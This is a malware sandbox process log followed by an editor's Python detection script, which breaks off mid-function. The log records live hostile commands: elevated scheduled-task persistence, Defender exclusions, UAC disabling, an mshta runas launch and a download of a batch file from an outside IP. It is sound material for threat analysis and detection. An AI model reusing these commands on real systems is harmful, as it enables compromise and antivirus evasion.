C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe'

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yoo8U08jApyH.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\Files\ama.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe

"C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"

C:\Users\Admin\AppData\Local\Temp\Files\builder.exe

"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"

C:\Windows\SysWOW64\fontdrvhost.exe

"C:\Windows\System32\fontdrvhost.exe"

C:\Users\Admin\AppData\Local\Temp\Files\crack.exe

"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"

C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe

"C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe"

C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe

"C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5604 -ip 5604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9021.tmp\9022.tmp\9023.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"

C:\Users\Admin\AppData\Local\Temp\Files\4434.exe

"C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE

"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9E3A.tmp\9E3B.tmp\9E3C.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66F5uGiqJAOk.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd2b4a46f8,0x7ffd2b4a4708,0x7ffd2b4a4718

C:\Windows\SysWOW64\timeout.exe

timeout 1

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:8

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y1zWGyz3dY2Y.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nji9VoGgO53z.bat" "

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"

C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe

"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1uotMJjAf1rr.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:8

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\ProgramData\javaw.exe

C:\ProgramData\javaw.exe

C:\Windows\system32\WerFaultSecure.exe

"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 3224 -i 3224 -h 416 -j 408 -s 448 -d 6092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 47024 -ip 47024

C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe

"C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 47024 -s 304

C:\Windows\system32\WerFaultSecure.exe

C:\Windows\system32\WerFaultSecure.exe -u -p 3224 -s 1228

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe > nul

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aTrKFTKtFFLY.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgvYUqhnL4t.bat" "

C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"

C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S4XNjx3QJkt7.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"

C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe

"C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5336 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q3k6WSWS4tTa.bat" "

C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\Edge.exe

"C:\Users\Admin\AppData\Local\Temp\Edge.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe

"C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"

C:\Users\Admin\AppData\Local\Temp\Files\t1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"

C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"

C:\Windows\system32\PING.EXE

ping 1.1.1.1 -n 1 -w 3000

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugCvnfQWROW5.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\djJ6SAoRVT0p.bat" "
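
The process list above is the raw sandbox record. The Python below is an added triage example from the editor, not part of the original report and not code from any of the samples it describes: it runs a handful of those command lines (copied above as constructed sample input, two of them abridged) through a small set of detection rules, and for every task-creation line pulls out the task name, the target path, whether it asks for the highest run level, and whether the target sits in a user-writable tree. The ATT&CK technique ids are the editor's mapping, and the regexes are tuned to these lines rather than to every variant of each tool.

```python
import re

# Constructed sample input: command lines copied from the process list above.
# Two are abridged (the powershell.exe path dropped; the OS-version one-liner
# reduced to its Register-ScheduledTask branch) so each fits in one string.
SAMPLE_CMDLINES = [
    r'"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"',
    r"Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force",
    r"powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'",
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F',
    r'mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main',
    r'"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"',
    r'powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"',
    "chcp 65001",
]

# Task creation via schtasks.exe or the PowerShell ScheduledTasks module.
TASK_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/create|Register-ScheduledTask', re.I)

# (technique id, label, pattern); a line may match more than one rule.
# The technique ids are the editor's mapping, not taken from the report.
RULES = [
    ("T1053.005", "scheduled task persistence", TASK_CREATE),
    ("T1562.001", "Defender exclusion added",
     re.compile(r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)', re.I)),
    ("T1548.002", "UAC policy values written with reg add",
     re.compile(r'reg\s+add\s+"?HK(?:EY_LOCAL_MACHINE|LM)\\.*Policies\\System"?\s+/v\s+"?'
                r'(?:EnableLUA|ConsentPromptBehaviorAdmin|PromptOnSecureDesktop)\b', re.I)),
    ("T1218.005", "mshta launching a program with the runas verb",
     re.compile(r'^mshta\b.*shellexecute\(.*"runas"', re.I)),
    ("T1218.011", "rundll32 loading a DLL from the user profile",
     re.compile(r'rundll32(?:\.exe)?"?\s+\S*\\Users\\[^,\s]*\.dll', re.I)),
    ("T1070.004", "delayed self-deletion (ping/timeout, then del)",
     re.compile(r'\b(?:ping|timeout)\b.*&.*\bdel\b', re.I)),
    ("T1105", "payload fetched with Invoke-WebRequest",
     re.compile(r'invoke-webrequest\s+-uri\s+(\S+)', re.I)),
]
LABELS = {tid: label for tid, label, _rx in RULES}
RULES_BY_ID = {tid: rx for tid, _label, rx in RULES}

# Pieces of a task-creation line worth keeping for the IOC list.
TASK_NAME = re.compile(r'''(?:/tn\s+|-TaskName\s+)['"]?([^'"]+?)['"]?(?=\s+[/-]|$)''', re.I)
TASK_TARGET = re.compile(r'''(?:/tr\s+|-Execute\s+)['"]*([^'"]+?)['"]*(?=\s*[)}]|\s+[/-]|$)''', re.I)
ELEVATED = re.compile(r"/rl\s+highest|-RunLevel\s+'?Highest'?", re.I)
# Trees an unprivileged user can write to; a task with highest run level
# pointing here is the classic self-elevating persistence pattern.
USER_WRITABLE = re.compile(r'\\(?:Users|ProgramData)\\', re.I)


def classify(cmdline):
    """Technique ids of every rule that matches this command line, in rule order."""
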